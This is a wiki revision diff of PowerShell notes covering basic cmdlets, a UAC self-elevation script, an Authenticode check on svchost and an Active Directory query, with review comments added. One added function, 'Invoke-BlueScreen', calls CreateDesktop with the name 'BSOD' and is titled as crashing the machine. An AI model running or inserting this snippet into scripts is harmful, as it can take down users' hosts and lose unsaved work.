Powershell: Difference between revisions

No edit summary   (change visibility)
No edit summary   (change visibility)
Line 9: Line 9:
*Get-ChildItem Env:
*Get-ChildItem Env:


= invoke bluescreen bsod =
<syntaxhighlight lang="powershell">
function Invoke-BlueScreen
{
    Add-Type "
      using System;
      using System.Runtime.InteropServices;
      public class PInvoke
      {
          [DllImport(`"user32.dll`")]
          public static extern IntPtr CreateDesktop(string desktopName, IntPtr device, IntPtr deviceMode, int flags, long accessMask, IntPtr attributes);
      }
    "
    [PInvoke]::CreateDesktop("BSOD", [IntPtr]::Zero, [IntPtr]::Zero, 0, $null, [IntPtr]::Zero)
}
</syntaxhighlight>


= self elevate =
= self elevate =
Start-Process PowerShell –Verb RunAs
or


Start-Process PowerShell –Verb RunAs
<syntaxhighlight lang="powershell">
<syntaxhighlight lang="powershell">
# Get the ID and security principal of the current user account
# Get the ID and security principal of the current user account
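Review bot: The added `Invoke-BlueScreen` function carries no comment saying what it does to the host and no confirmation step, so a reader who pastes the section runs the `CreateDesktop` call immediately. A header comment such as `# Calls user32!CreateDesktop with a desktop named "BSOD"; the section title says this bluescreens the machine - unsaved work is lost` would make the effect explicit. The function could also declare `[CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='High')]` and wrap the call in `if ($PSCmdlet.ShouldProcess($env:COMPUTERNAME, 'Invoke-BlueScreen')) { ... }` so that it prompts before acting. Whether the call still takes a system down presumably depends on the Windows build and patch level, and the page does not say which it was tested on.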

Revision as of 13:59, 21 November 2013

  • get-help
  • get-command
  • get-module
  • $PSVersionTable.psversion
  • get-history
  • get-process | get-member
  • Get-Host
  • $psversiontable
  • Get-ChildItem Env:


invoke bluescreen bsod

# Invoke-BlueScreen: compiles a P/Invoke wrapper for CreateDesktop in user32.dll
# and calls it once with the desktop name "BSOD". Takes no parameters; if the
# call returns, the IntPtr it returns is written to the pipeline.
# NOTE(review): the section title says this bluescreens the machine. Nothing in
# the code itself establishes that; the outcome presumably depends on the Windows
# build and patch level - confirm on the target version before relying on it, and
# treat the call as one that can take the host down with unsaved work lost.
# NOTE(review): the inline C# passed to Add-Type and the DllImport of user32.dll
# appear in PowerShell script block logging where that is enabled, which gives
# defenders a place to look for this pattern.
function Invoke-BlueScreen
{
    # Add-Type compiles the C# source in the string below at run time.
    # `" is PowerShell's escape for a double quote inside a double-quoted string.
    # NOTE(review): accessMask is declared as a 64-bit long, while the documented
    # Win32 parameter is an ACCESS_MASK (32-bit) - confirm whether that is intended.
    Add-Type "
      using System;
      using System.Runtime.InteropServices;
      public class PInvoke
      {
          [DllImport(`"user32.dll`")]
          public static extern IntPtr CreateDesktop(string desktopName, IntPtr device, IntPtr deviceMode, int flags, long accessMask, IntPtr attributes);
      }
    "

    # Desktop name "BSOD", zero pointers for device, deviceMode and attributes,
    # flags 0; $null is passed for the long accessMask (presumably converted to 0).
    [PInvoke]::CreateDesktop("BSOD", [IntPtr]::Zero, [IntPtr]::Zero, 0, $null, [IntPtr]::Zero)
}

self elevate

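# Open a new PowerShell window elevated through the "RunAs" verb (UAC prompt).
# The parameter uses an ASCII hyphen: the typographic en dash (U+2013) the page
# had is tolerated by PowerShell's parser but does not survive every copy/paste
# path (cmd.exe, scheduled-task arguments, other shells).
Start-Process PowerShell -Verb RunAs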

or

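# Self-elevation preamble: when the script is not already running with the
# built-in Administrator role it relaunches itself elevated (UAC prompt) and
# ends the current, unelevated instance.

# Get the identity and security principal of the current user account
$myWindowsID = [System.Security.Principal.WindowsIdentity]::GetCurrent()
$myWindowsPrincipal = New-Object System.Security.Principal.WindowsPrincipal($myWindowsID)

# Get the security principal for the Administrator role
$adminRole = [System.Security.Principal.WindowsBuiltInRole]::Administrator

# Check to see if we are currently running "as Administrator"
if ($myWindowsPrincipal.IsInRole($adminRole))
   {
   # Already elevated - change the title and background colour to make that visible
   $Host.UI.RawUI.WindowTitle = $myInvocation.MyCommand.Definition + "(Elevated)"
   $Host.UI.RawUI.BackgroundColor = "DarkBlue"
   Clear-Host
   }
else
   {
   # Not elevated - relaunch this script as administrator

   # At script scope MyCommand.Definition holds the path of the running script
   $scriptPath = $myInvocation.MyCommand.Definition

   # Create a new process object that starts PowerShell
   $newProcess = New-Object System.Diagnostics.ProcessStartInfo "PowerShell"

   # Hand the script over with -File and a quoted path. A bare path is read by
   # Windows PowerShell as command text, so a path with spaces fails to launch
   # and characters such as ';' or '&' in the path would be executed as code in
   # the elevated session.
   $newProcess.Arguments = '-File "{0}"' -f $scriptPath

   # Indicate that the process should be elevated
   $newProcess.Verb = "runas"

   # Start the new process; Start() throws when the UAC prompt is declined, so
   # report that instead of exiting silently. The returned Process object is
   # discarded so it is not written to the pipeline.
   try
      {
      $null = [System.Diagnostics.Process]::Start($newProcess)
      }
   catch
      {
      Write-Warning ("Elevated relaunch failed: " + $_.Exception.Message)
      }

   # Exit from the current, unelevated, process
   exit
   }

# Run your code that needs to be elevated here
Write-Host -NoNewLine "Press any key to continue..."
$null = $Host.UI.RawUI.ReadKey("NoEcho,IncludeKeyDown")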


check authenticity of process (Authenticode signature of the executable file on disk)

PS C:\WINDOWS\system32> (get-process svchost | select-object path).path | Get-AuthenticodeSignature


    Directory: C:\WINDOWS\system32


SignerCertificate                         Status                                 Path
-----------------                         ------                                 ----
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe
9C4F3BDB96A8F46DB59EDBB7A65CC090841236AA  Valid                                  svchost.exe


# Get information about the Active Directory domain.
# Get-ADDomain is provided by the ActiveDirectory module, so that module must be
# installed and loadable on the machine where this runs.
get-addomain